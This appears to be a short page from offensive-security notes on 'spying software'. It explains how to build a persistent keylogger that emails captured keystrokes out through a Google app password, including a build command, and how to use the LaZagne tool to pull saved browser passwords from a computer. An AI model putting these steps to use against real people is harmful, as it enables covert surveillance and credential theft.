Spying Software
Last updated
Last updated
Remote persistent keylogger for Windows and Linux.
Before start go to your google account and go to the google sign in section and click on app passwords, generate an app password.
Copy that password to auth with the program.
zlogger -i 60 --windows -e 'test@email' -p 'password' -o <output_filename>'
The LaZagne project is an open-source application used to retrieve lots of passwords stored on a local computer.
Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
This tool has been developed for the purpose of finding these passwords for the most commonly used software.
LaZagne have's different modules to target programs, browsers, etc.
Here we are getting all saved passwords on the browsers using the browser module.
There are a lot more modules to try, you can see it in the LaZagne repository.